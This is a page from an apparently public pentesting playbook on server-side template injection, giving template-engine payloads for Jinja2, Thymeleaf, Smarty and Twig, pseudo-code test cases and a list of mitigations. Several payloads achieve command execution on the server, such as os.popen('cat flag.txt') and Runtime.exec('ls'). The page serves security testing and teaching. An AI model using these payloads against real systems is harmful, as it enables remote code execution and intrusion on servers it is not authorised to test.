PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  1. Web App Pentesting

SSTI

http://IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

Description

Server-Side Template Injection (SSTI) occurs when user input is embedded directly into a server-side template, allowing attackers to inject and execute arbitrary code on the server.

Example with Scenario

Scenario: A web application uses a template engine to render web pages, and it incorporates user input directly into the template without proper sanitization. An attacker can craft malicious input to manipulate the template engine and execute arbitrary code.

Payloads and Test Cases

Payloads

  1. Jinja2 (Python):

    {{ 7*7 }}
    {{ config.items() }}
  2. Thymeleaf (Java):

    ${T(java.lang.Runtime).getRuntime().exec("ls")}
  3. Smarty (PHP):

    {$smarty.version}
    {php}echo `ls`;{/php}
  4. Twig (PHP):

    {{ 7*7 }}
    {{ system('ls') }}

Test Cases

  1. Jinja2 (Python):

    • Payload:

      {{ 7*7 }}
      {{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("{{ 7*7 }}")
      # Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("{{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}")
      # Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  2. Thymeleaf (Java):

    • Payload:

      ${7*7}
      ${T(java.lang.Runtime).getRuntime().exec("ls")}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("${7*7}")
      // Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("${T(java.lang.Runtime).getRuntime().exec('ls')}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  3. Smarty (PHP):

    • Payload:

      {$smarty.version}
      {php}echo `ls`;{/php}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("{$smarty.version}")
      // Verify if the template rendered the expression correctly
      checkResponseForSmartyVersion()
      
      sendPayloadToServer("{php}echo `ls`;{/php}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")
  4. Twig (PHP):

    • Payload:

      {{ 7*7 }}
      {{ system('ls') }}
    • Test Case:

      // Send payload to the server
      sendPayloadToServer("{{ 7*7 }}")
      // Verify if the template rendered the expression correctly
      checkResponseForValue("49")
      
      sendPayloadToServer("{{ system('ls') }}")
      // Verify if the command executed correctly
      checkResponseForCommandExecution("ls")

Mitigation

  1. Input Sanitization:

    • Sanitize user input to ensure it does not contain malicious code.

    • Use escaping functions to properly escape user input before embedding it in templates.

  2. Use Safe Template Engines:

    • Use template engines that do not allow arbitrary code execution or have strict separation between logic and presentation.

    • Configure template engines to disable or restrict dynamic code execution features.

  3. Content Security Policy (CSP):

    • Implement a strict Content Security Policy to limit the sources from which content can be loaded.

    • Use CSP to prevent the execution of inline scripts and styles.

  4. Whitelist Allowable Expressions:

    • Define and enforce a whitelist of allowable template expressions.

    • Restrict the use of dynamic expressions and variables within templates.

  5. Security Testing:

    • Conduct regular security testing, including fuzzing and penetration testing, to identify and mitigate SSTI vulnerabilities.

    • Use automated security tools to detect and prevent SSTI vulnerabilities in your codebase.

PreviousIDORNextBroken Access Control/Privilege Escalation

Last updated 10 months ago